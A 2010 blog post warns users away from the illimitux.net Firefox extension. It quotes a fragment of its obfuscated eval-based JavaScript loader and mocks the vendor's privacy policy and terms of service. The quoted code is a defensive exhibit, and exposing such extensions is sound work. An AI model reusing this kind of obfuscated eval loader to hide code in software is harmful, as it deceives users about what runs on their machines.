Seth Wisely said

April 18, 2010

illimitux.net firefox extension up to no good: evil intent inside

Filed under: CIO, interweb — Seth Wisely @ 19:21

Worse than malware?  It’s about the same.

both these files in the illimitux.net extension:

xpi: chrome\illimitux.jar\content\hoster.js
xpi: chrome\illimitux.jar\content\illimitux.js

employ JavaScript obfuscation.  Smells like malware.

eval((function(x){var d=””;var p=0;while(p<x.length){if(x.charAt(p)!=”`”)d+=x.charAt(p++);else{var l=x.charCodeAt(p+3)-28;if(l>4)d+=d.substr(d.length-x.charCodeAt(p+1)*96-x.charCodeAt(p+2)+3104-l,l);else d+=”`”;p+=4}}return d})

utf8_encode(argString`!^\”s` ‘!=` -&+\”\”).replace(/\\r\\n/g,\”\\n` (*` ,$`%S!utftext`%_$start,end` ‘#ringl=0;` 3!=end` ‘!` 0\”` \”\”`\”s$for(var n=0;n<` =#;n++`!f\”c1` H$charCodeAt(n`!>\”enc=null;if(c1<128){end++`#F&c1>127&&c1<204` ;!c=`\”O\”.fromC` n#(c1>>6|192)+` )2&63|128)` v\”` K912|224` Q4>>6` d$` j=if(enc!=`\”B!){` *!d>`#P!){`#|#+`\”y$sub` $\”(`$%%);}` =%enc`$$’n+1;}` z\”` HE`$L));`&z$` P#`&Q+convert(data`$e\”b64=\”ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=`&J\”o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc=\”\”,tmp_arr=[];if(!`!I\”`!s#data;}data=`(C,data+\”\”);do{o1=data`&V(i++);o2=` \”23` \”2bits=o1<<16|o2<<8|o3;h1=bits>>18&63;h2` ‘$2` *!3` (#6` )!4` )!&63;`\”0#[ac++]=b64`!)!At(h1)+` #(2)` \”)3` 0*4);}while(i<`!o!`$u$enc=` }#.join(\”\”);switch`\”w!` B#%3)

DANGER WILL ROBINSON

I cannot be bothered to de-obfuscate now.  That they employ such nefarious tactics to what ought be a benign product is reason enough to NOT USE IT.  Their ‘contact us’ form is unusable.. big surprise.

extension lifts code from various userscript developers without attribution. tsk tsk

privacy? where?

“is accessible via http://www.illimitux.net or illimitux.com, for technical reasons” — ‘privacy’ policy

When did ignorance become a technical reason?

“In accordance with this Privacy Policy, we may use or disclose identifiable information other than those described herein without informing you or giving you the opportunity to consent to such amendments on the use and disclosure of your data.”

Why bother having a ‘privacy’ policy at all?

But wait there’s more… totally absurd TOS:

you warrant that:
– You are a physical person
– You will not use any ad blockers

What other kind of persons are there?  Not-use adblock?  Byte me!

We can not control the use of our service by users.

Yes, you can.

Any exemption to above rules will be accompanied by a ban.

Mmmm mighty fine Engrish.

ditch!

update: illimitux deobfuscated

illimitux.js deobfuscated: http://pastebin.com/RzYWNwbp
source md5: d91b5553107666ffadbffee16e6a9ffe

hoster.js deobfuscated: http://pastebin.com/A7uDmRDA
source md5: aa9685d48a14668176823cb887b67260

Seth Wisely said: you bring the hot tar I’ll bring the feathers

Advertisements

Create a free website or blog at WordPress.com.

%d bloggers like this: